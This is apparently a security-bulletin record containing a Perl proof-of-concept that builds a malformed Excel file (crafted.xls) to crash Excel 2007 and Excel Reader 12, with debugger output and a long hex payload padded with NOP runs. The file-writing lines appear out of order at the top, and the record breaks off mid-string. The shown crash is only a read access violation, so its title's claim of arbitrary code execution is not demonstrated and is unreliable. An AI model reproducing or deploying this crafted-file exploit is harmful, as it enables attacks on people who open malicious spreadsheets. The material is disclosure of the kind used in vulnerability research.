open(C, ">:raw", "crafted.xls");
print C $crafted;
close(C);
http://0xffe4.org
{"id": "SECURITYVULNS:DOC:28631", "bulletinFamily": "software", "title": "Microsoft Office Excel ReadAV Arbitrary Code Execution", "description": "\r\n\r\n#!/usr/bin/perl\r\n \r\n# Microsoft Office Excel ReadAV Arbitrary Code Execution\r\n \r\n# Author: Jean Pascal Pereira <pereira@secbiz.de>\r\n \r\n# Vendor URI: http://office.microsoft.com\r\n \r\n# Vendor Description:\r\n# Microsoft Excel is a commercial spreadsheet application written and distributed by Microsoft for Microsoft Windows and Mac OS X.\r\n# It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.\r\n\r\n# Affected versions:\r\n# Microsoft Office 2007 (confirmed)\r\n# Microsoft Excel Reader 12 (confirmed)\r\n# Microsoft Office 2010 (not confirmed yet)\r\n\r\n# Debug Info:\r\n# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86\r\n# Copyright (c) Microsoft Corporation. All rights reserved.\r\n# \r\n# CommandLine: "C:\Program Files\Microsoft Office\Office12\XLVIEW.EXE" C:\research\MSExcel\crafted.xls\r\n# Symbol search path is: *** Invalid ***\r\n# ****************************************************************************\r\n# * Symbol loading may be unreliable without a symbol search path. *\r\n# * Use .symfix to have the debugger choose a symbol path. *\r\n# * After setting your symbol path, use .reload to refresh symbol locations. *\r\n# ****************************************************************************\r\n# Executable search path is: \r\n# ModLoad: 30000000 30cd8000 Excel.exe\r\n# ModLoad: 7c900000 7c9b2000 ntdll.dll\r\n# ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll\r\n# ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll\r\n# ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll\r\n# ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll\r\n# ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll\r\n# ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll\r\n# ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll\r\n# ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll\r\n# ModLoad: 78130000 781cb000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\MSVCR80.dll\r\n# ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV\r\n# ModLoad: 3a9d0000 3b754000 C:\Program Files\Microsoft Office\Office12\oart.dll\r\n# ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll\r\n# (9c.380): Break instruction exception - code 80000003 (first chance)\r\n# ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL\r\n# ModLoad: 32600000 3361f000 C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll\r\n# ModLoad: 7d1e0000 7d49c000 C:\WINDOWS\system32\msi.dll\r\n# ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll\r\n# ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\Comctl32.dll\r\n# ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll\r\n# ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll\r\n# ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll\r\n# ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime\r\n# ModLoad: 01080000 016d4000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSORES.DLL\r\n# ModLoad: 016e0000 020bd000 C:\Program Files\Common Files\Microsoft Shared\office12\1033\MSOINTL.DLL\r\n# ModLoad: 3bd10000 3bea4000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL\r\n# ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\WTSAPI32.DLL\r\n# ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll\r\n# ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll\r\n# ModLoad: 79000000 7904a000 C:\WINDOWS\system32\mscoree.dll\r\n# ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.DLL\r\n# ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL\r\n# ModLoad: 5d090000 5d12a000 C:\WINDOWS\system32\comctl32.dll\r\n# ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL\r\n# ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll\r\n# ModLoad: 02450000 02715000 C:\WINDOWS\system32\xpsp2res.dll\r\n# ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll\r\n# ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.DLL\r\n# ModLoad: 3a780000 3a889000 C:\Program Files\Common Files\Microsoft Shared\office12\riched20.dll\r\n# (9c.380): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=00000001 ebx=00128320 ecx=00123b40 edx=008d2d04 esi=02284800 edi=00000130\r\n# eip=3025c1fc esp=00123b30 ebp=00123b48 iopl=0 nv up ei pl nz na po nc\r\n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\n# *** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe - \r\n# Excel!Ordinal40+0x25c1fc:\r\n# 3025c1fc 668b0f mov cx,word ptr [edi] ds:0023:00000130=????\r\n# 0:000> r;!exploitable -v;q\r\n# eax=00000001 ebx=00128320 ecx=00123b40 edx=008d2d04 esi=02284800 edi=00000130\r\n# eip=3025c1fc esp=00123b30 ebp=00123b48 iopl=0 nv up ei pl nz na po nc\r\n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\n# Excel!Ordinal40+0x25c1fc:\r\n# 3025c1fc 668b0f mov cx,word ptr [edi] ds:0023:00000130=????\r\n# HostMachine\HostUser\r\n# Executing Processor Architecture is x86\r\n# Debuggee is in User Mode\r\n# Debuggee is a live user mode debugging session on the local machine\r\n# Event Type: Exception\r\n# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - \r\n# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - \r\n# Exception Faulting Address: 0x130\r\n# First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)\r\n# Exception Sub-Type: Read Access Violation\r\n\r\n# Proof of Concept:\r\n\r\nmy $crafted =\r\n\r\n"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00".\r\n"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".\r\n"\x22\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xFE\xFF\xFF\xFF".\r\n"\x00\x00\x00\x00\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x21\x00\x00\x00";\r\n\r\n$crafted .= "\xFF" x 432;\r\n\r\n$crafted .=\r\n\r\n"\x09\x08\x08\x00\x00\x05\x05\x00\xAE\x21\xCD\x07\xE1\x00\x00\x00".\r\n"\xC1\x00\x02\x00\x00\x00\xBF\x00\x00\x00\xC0\x00\x00\x00\xE2\x00".\r\n"\x00\x00\x5C\x00\x70\x00\x07\x70\x65\x72\x65\x69\x72\x61\x20\x50".\r\n"\x2E\x20\x50\x65\x72\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n"\x20\x20\x20\x20\x20\x20\x42\x00\x02\x00\xE4\x04\x9C\x00\x02\x00".\r\n"\x0E\x00\x16\x00\x02\x00\x01\x00\x17\x00\x1D\x00\x1B\x03\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x18\x00\x24\x00\x20\x00\x00".\r\n"\x01\x15\x00\x01\x00\x01\x00\x00\x00\x00\x00\x06\x3B\xFF\xFF\x00".\r\n"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00".\r\n"\x0A\x19\x00\x02\x00\x00\x00\x12\x00\x02\x00\x00\x00\x13\x00\x02".\r\n"\x00\x00\x00\x3D\x00\x12\x00\x00\x00\x30\x00\xAC\x2F\xF4\x1A\x38".\r\n"\x00\x00\x00\x00\x00\x01\x00\x58\x02\x40\x00\x02\x00\x00\x00\x8D".\r\n"\x00\x02\x00\x00\x00\x22\x00\x02\x00\x00\x00\x0E\x00\x02\x00\x01".\r\n"\x00\xB7\x01\x02\x00\x00\x00\xDA\x00\x02\x00\x00\x00\x31\x00\x14".\r\n"\x00\xC8\x00\x00\x00\xFF\x7F\x90\x01\x00\x00\x00\x00\x00\x00\x05".\r\n"\x41\x72\x69\x61\x6C\x31\x00\x14\x00\xC8\x00\x00\x00\xFF\x7F\x90".\r\n"\x01\x00\x00\x00\x00\x00\x00\x05\x41\x72\x69\x61\x6C\x31\x00\x14".\r\n"\x00\xC8\x00\x00\x00\xFF\x7F\x90\x01\x00\x00\x00\x00\x00\x00\x05".\r\n"\x41\x72\x69\x61\x6C\x31\x00\x14\x00\xC8\x00\x00\x00\xFF\x7F\x90".\r\n"\x01\x00\x00\x00\x00\x00\x00\x05\x41\x72\x69\x61\x6C\x31\x00\x14".\r\n"\x00\x59\x01\x01\x00\xFF\x7F\xBC\x02\x00\x00\x00\x00\x00\x00\x05".\r\n"\x41\x72\x69\x61\x6C\x31\x00\x14\x00\x31\x01\x01\x00\xFF\x7F\xBC".\r\n"\x02\x00\x00\x00\x00\x00\x00\x05\x41\x72\x69\x61\x6C\x31\x00\x14".\r\n"\x00\x45\x01\x01\x00\xFF\x7F\xBC\x02\x00\x00\x00\x00\x00\x00\x05".\r\n"\x41\x72\x69\x61\x6C\x31\x00\x14\x00\x45\x01\x00\x00\xFF\x7F\x90".\r\n"\x01\x00\x00\x00\x00\x00\x00\x05\x41\x72\x69\x61\x6C\x1E\x04\x1A".\r\n"\x00\x05\x00\x17\x22\x24\x22\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5C".\r\n"\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x5C\x29\x1E\x04\x1F\x00\x06".\r\n"\x00\x1C\x22\x24\x22\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5B\x52\x65".\r\n"\x64\x5D\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x5C\x29\x1E\x04".\r\n"\x20\x00\x07\x00\x1D\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30".\r\n"\x5F\x29\x3B\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30".\r\n"\x5C\x29\x1E\x04\x25\x00\x08\x00\x22\x22\x24\x22\x23\x2C\x23\x23".\r\n"\x30\x2E\x30\x30\x5F\x29\x3B\x5B\x52\x65\x64\x5D\x5C\x28\x22\x24".\r\n"\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x1E\x04\x35\x00\x2A".\r\n"\x00\x32\x5F\x28\x22\x24\x22\x2A\x20\x23\x2C\x23\x23\x30\x5F\x29".\r\n"\x3B\x5F\x28\x22\x24\x22\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x5C".\r\n"\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D\x22\x5F\x29\x3B\x5F".\r\n"\x28\x40\x5F\x29\x1E\x04\x2C\x00\x29\x00\x29\x5F\x28\x2A\x20\x23".\r\n"\x2C\x23\x23\x30\x5F\x29\x3B\x5F\x28\x2A\x20\x5C\x28\x23\x2C\x23".\r\n"\x23\x30\x5C\x29\x3B\x5F\x28\x2A\x20\x22\x2D\x22\x5F\x29\x3B\x5F".\r\n"\x28\x40\x5F\x29\x1E\x04\x3D\x00\x2C\x00\x3A\x5F\x28\x22\x24\x22".\r\n"\x2A\x20\x23\x2C\x23\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5F\x28\x22".\r\n"\x24\x22\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29".\r\n"\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D\x22\x3F\x3F\x5F\x29\x3B".\r\n"\x5F\x28\x40\x5F\x29\x1E\x04\x34\x00\x2B\x00\x31\x5F\x28\x2A\x20".\r\n"\x23\x2C\x23\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5F\x28\x2A\x20\x5C".\r\n"\x28\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x3B\x5F\x28\x2A\x20".\r\n"\x22\x2D\x22\x3F\x3F\x5F\x29\x3B\x5F\x28\x40\x5F\x29\x1E\x04\x06".\r\n"\x00\xA4\x00\x03\x30\x2E\x30\x1E\x04\x08\x00\xA5\x00\x05\x30\x2E".\r\n"\x30\x30\x30\xE0\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\x00\xC0".\r\n"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x01\x00\x00\x00\xF5".\r\n"\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x01".\r\n"\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".\r\n"\x00\x10\x00\x02\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00".\r\n"\x00\x00\x00\xE0\x00\x10\x00\x02\x00\x00\x00\xF5\xFF\x20\xF4\xC0".\r\n"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5".\r\n"\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00".\r\n"\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".\r\n"\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00".\r\n"\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\xF4\xC0".\r\n"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5".\r\n"\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00".\r\n"\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".\r\n"\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00".\r\n"\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5\xFF\x20\xF4\xC0".\r\n"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\xF5".\r\n"\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00".\r\n"\x00\x00\x00\xF5\xFF\x20\xF4\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".\r\n"\x00\x10\x00\x00\x00\x00\x00\x01\x00\x20\x00\xC0\x20\x00\x00\x00".\r\n"\x00\x00\x00\xE0\x00\x10\x00\x01\x00\x2B\x00\xF5\xFF\x20\xF8\xC0".\r\n"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x01\x00\x29\x00\xF5".\r\n"\xFF\x20\xF8\xC0\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x01".\r\n"\x00\x2C\x00\xF5\xFF\x20\xF8\xC0\x20\x00\x00\x00\x00\x00\x00\xE0".\r\n"\x00\x10\x00\x01\x00\x2A\x00\xF5\xFF\x20\xF8\xC0\x20\x00\x00\x00".\r\n"\x00\x00\x00\xE0\x00\x10\x00\x01\x00\x09\x00\xF5\xFF\x20\xF8\xC0".\r\n"\x20\x00\x00\x00\x00\x00\x00\xE0\x00\x10\x00\x00\x00\x00\x00\x01".\r\n"\x00\x20\x20\xC0\x20\x40\x80\x49\x80\x40\x20\xE0\x00\x10\x00\x00".\r\n"\x00\x00\x00\x01\x00\x00\x30\xC0\x20\x40\x80\x49\x80\x40\x20\xE0".\r\n"\x00\x10\x00\x00\x00\x00\x00\x01\x00\x0B\x30\xC0\x20\x40\x80\x49".\r\n"\x80\x40\x20\xE0\x00\x10\x00\x00\x00\x00\x00\x01\x00\x08\x30\xC0".\r\n"\x20\x40\x80\x49\x80\x40\x20\xE0\x00\x10\x00\x00\x00\xA4\x00\x01".\r\n"\x00\x20\x24\xC0\x20\x40\x80\x49\x80\x40\x20\xE0\x00\x10\x00\x00".\r\n"\x00\xA5\x00\x01\x00\x20\x24\xC0\x20\x40\x80\x49\x80\x40\x20\xE0".\r\n"\x00\x10\x00\x00\x00\x00\x00\x01\x00\x20\x60\x2A\x20\x41\x80\x49".\r\n"\x80\x40\x20\x93\x02\x04\x00\x10\x80\x03\xFF\x93\x02\x04\x00\x11".\r\n"\x80\x06\xFF\x93\x02\x04\x00\x12\x80\x04\xFF\x93\x02\x04\x00\x13".\r\n"\x80\x07\xFF\x93\x02\x04\x00\x00\x80\x00\xFF\x93\x02\x04\x00\x14".\r\n"\x80\x05\xFF\x92\x00\xE2\x00\x38\x00\x00\x00\x00\x00\xFF\xFF\xFF".\r\n"\x00\xFF\x00\x00\x00\x00\xFF\x00\x00\x00\x00\xFF\x00\xFF\xFF\x00".\r\n"\x00\xFF\x00\xFF\x00\x00\xFF\xFF\x00\x80\x00\x00\x00\x00\x80\x00".\r\n"\x00\x00\x00\x80\x00\x80\x80\x00\x00\x80\x00\x80\x00\x00\x80\x80".\r\n"\x00\xC0\xC0\xC0\x00\x80\x80\x80\x00\x99\x99\xFF\x00\x99\x33\x66".\r\n"\x00\xFF\xFF\xCC\x00\xCC\xFF\xFF\x00\x66\x00\x66\x00\xFF\x80\x80".\r\n"\x00\x00\x66\xCC\x00\xCC\xCC\xFF\x00\x00\x00\x80\x00\xFF\x00\xFF".\r\n"\x00\xFF\xFF\x00\x00\x00\xFF\xFF\x00\x80\x00\x80\x00\x80\x00\x00".\r\n"\x00\x00\x80\x80\x00\x00\x00\xFF\x00\x00\xCC\xFF\x00\xCC\xFF\xFF".\r\n"\x00\xCC\xFF\xCC\x00\xFF\xFF\x99\x00\x99\xCC\xFF\x00\xFF\x99\xCC".\r\n"\x00\xCC\x99\xFF\x00\xE3\xE3\xE3\x00\x33\x66\xFF\x00\x33\xCC\xCC".\r\n"\x00\x99\xCC\x00\x00\xFF\xCC\x00\x00\xFF\x99\x00\x00\xFF\x66\x00".\r\n"\x00\x66\x66\x99\x00\x96\x96\x96\x00\x00\x33\x66\x00\x33\x99\x66".\r\n"\x00\x00\x33\x00\x00\x33\x33\x00\x00\x99\x33\x00\x00\x99\x33\x66".\r\n"\x00\x33\x33\x99\x00\x33\x33\x33\x00\x85\x00\x22\x00\xF3\x06\x00".\r\n"\x00\x00\x00\x1B\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x0A".\r\n"\x00\x00\x00\x09\x08\x08\x00\x00\x06\x10\x00\xAE\x21\xCD\x07\x0B".\r\n"\x02\x10\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x8F\x09\x00\x00\x07".\r\n"\x19\x00\x00\x0D\x00\x02\x00\x01\x00\x0C\x00\x02\x00\x64\x00\x0F".\r\n"\x00\x02\x00\x01\x00\x11\x00\x02\x00\x00\x00\x10\x00\x08\x00\xFC".\r\n"\xA9\xF1\xD2\x4D\x62\x50\x3F\x5F\x00\x02\x00\x01\x00\x2A\x00\x02".\r\n"\x00\x00\x00\x2B\x00\x02\x00\x00\x00\x82\x00\x02\x00\x01\x00\x80".\r\n"\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x25\x02\x04\x00\x00".\r\n"\x00\x08\x01\x8C\x00\x04\x00\x01\x00\x01\x00\x81\x00\x02\x00\xC1".\r\n"\x04\x14\x00\x00\x00\x15\x00\x00\x00\x83\x00\x02\x00\x00\x00\x84".\r\n"\x00\x02\x00\x00\x00\x26\x00\x08\x00\x00\x00\x00\x00\x00\x00\xF0".\r\n"\x3F\x27\x00\x08\x00\x00\x00\x00\x00\x00\x00\xE0\x3F\x4D\x00\xBC".\r\n"\x01\x00\x00\x45\x50\x53\x4F\x4E\x20\x53\x74\x79\x6C\x75\x73\x20".\r\n"\x43\x4F\x4C\x4F\x52\x20\x36\x34\x30\x00\x00\x00\x00\x32\x7A\x2D".\r\n"\x30\xE4\x04\x00\x04\x17\x02\x94\x00\x26\x01\x0F\x8B\x80\x07\x01".\r\n"\x00\x01\x00\xEA\x0A\x6F\x08\x00\x00\x01\x00\x07\x00\x68\x01\x02".\r\n"\x00\x00\x00\x68\x01\x00\x00\x00\x00\x00\xBB\x13\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x6D\x04\x30\x09\x04\x00".\r\n"\x00\x00\x00\x00\x00\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".\r\n"\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x20\x01\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x44\x4C\x4C\x4E\x61\x6D\x65\x31\x36".\r\n"\x3D\x45\x50\x49\x47\x55\x45\x33\x4F\x2E\x44\x4C\x4C\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x44\x4C\x4C\x4E\x61\x6D\x65\x33\x32".\r\n"\x3D\x45\x50\x49\x44\x41\x32\x33\x30\x2E\x44\x4C\x4C\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x45\x50\x53\x4F\x4E\x20\x53\x74\x79".\r\n"\x6C\x75\x73\x20\x43\x4F\x4C\x4F\x52\x20\x36\x34\x30\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x03\x02\x00\x68\x01\x68\x01\x01".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x00\xA0\x0B\x88".\r\n"\x0E\xA0\x0B\x88\x0E\x64\x00\x68\x01\x68\x01\xF4\x0B\x78\x0F\x2A".\r\n"\x00\x2A\x00\x2A\x00\xC6\x00\xF4\x0B\x78\x0F\x2A\x00\x2A\x00\x2A".\r\n"\x00\xC6\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x32\x00\x00\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03".\r\n"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00".\r\n"\x00\x00\x00\x01\x00\x04\x00\x06\x00\x02\x00\x00\x00\x00\x00\x00".\r\n"\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x03\x4C\x04\x02".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA1\x00\x22".\r\n"\x00\x01\x00\x64\x00\x01\x00\x01\x00\x01\x00\x02\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\xE0\x3F\x00\x00\x00\x00\x00\x00\xE0".\r\n"\x3F\x01\x00\x16\x00\x02\x00\x01\x00\x17\x00\x02\x00\x01\x02\x55".\r\n"\x00\x02\x00\x08\x00\x7D\x00\x0C\x00\x00\x00\x00\x00\xC7\x0C\x0F".\r\n"\x00\x00\x00\x02\x00\x7D\x00\x0C\x00\x01\x00\x02\x00\xC7\x06\x0F".\r\n"\x00\x00\x00\x02\x00\x7D\x00\x0C\x00\x04\x00\x05\x00\xC7\x06\x0F".\r\n"\x00\x00\x00\x02\x00\x7D\x00\x0C\x00\x07\x00\x08\x00\xC7\x06\x0F".\r\n"\x00\x00\x00\x02\x00\x00\x02\x0A\x00\x00\x00\x1B\x00\x00\x00\x0B".\r\n"\x00\x00\x00\x08\x02\x10\x00\x00\x00\x00\x00\x0B\x00\x08\x01\x00".\r\n"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x02\x00\x00\x00\x0B".\r\n"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x04".\r\n"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".\r\n"\x02\x10\x00\x05\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".\r\n"\x01\x0F\x00\x08\x02\x10\x00\x06\x00\x00\x00\x0B\x00\x10\x02\x00".\r\n"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x07\x00\x00\x00\x0B".\r\n"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x08".\r\n"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".\r\n"\x02\x10\x00\x09\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".\r\n"\x01\x0F\x00\x08\x02\x10\x00\x0A\x00\x00\x00\x0B\x00\x08\x01\x00".\r\n"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x0B\x00\x00\x00\x0B".\r\n"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x0C".\r\n"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".\r\n"\x02\x10\x00\x0D\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".\r\n"\x01\x0F\x00\x08\x02\x10\x00\x0E\x00\x00\x00\x0B\x00\x08\x01\x00".\r\n"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x0F\x00\x00\x00\x0B".\r\n"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x10".\r\n"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".\r\n"\x02\x10\x00\x11\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".\r\n"\x01\x0F\x00\x08\x02\x10\x00\x12\x00\x00\x00\x0B\x00\x08\x01\x00".\r\n"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x13\x00\x00\x00\x0B".\r\n"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x14".\r\n"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".\r\n"\x02\x10\x00\x15\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".\r\n"\x01\x0F\x00\x08\x02\x10\x00\x16\x00\x00\x00\x0B\x00\x08\x01\x00".\r\n"\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x17\x00\x00\x00\x0B".\r\n"\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08\x02\x10\x00\x19".\r\n"\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00\x01\x0F\x00\x08".\r\n"\x02\x10\x00\x1A\x00\x00\x00\x0B\x00\x08\x01\x00\x00\x00\x00\x00".\r\n"\x01\x0F\x00\x04\x02\x2B\x00\x00\x00\x00\x00\x0F\x00\x23\x00\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x04\x02\x24\x00\x02\x00\x00\x00\x0F\x00\x1C\x00\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x04\x02\x11\x00\x04\x00".\r\n"\x00\x00\x1B\x00\x09\x00\x90\x90\x90\x90\x90\x90\x90\x20\x23\x04".\r\n"\x02\x0A\x00\x04\x00\x01\x00\x1B\x00\x02\x00\x23\x33\x04\x02\x0A".\r\n"\x00\x04\x00\x02\x00\x1B\x00\x02\x00\x23\x34\x01\x02\x06\x00\x04".\r\n"\x00\x03\x00\x1B\x00\x04\x02\x0B\x00\x04\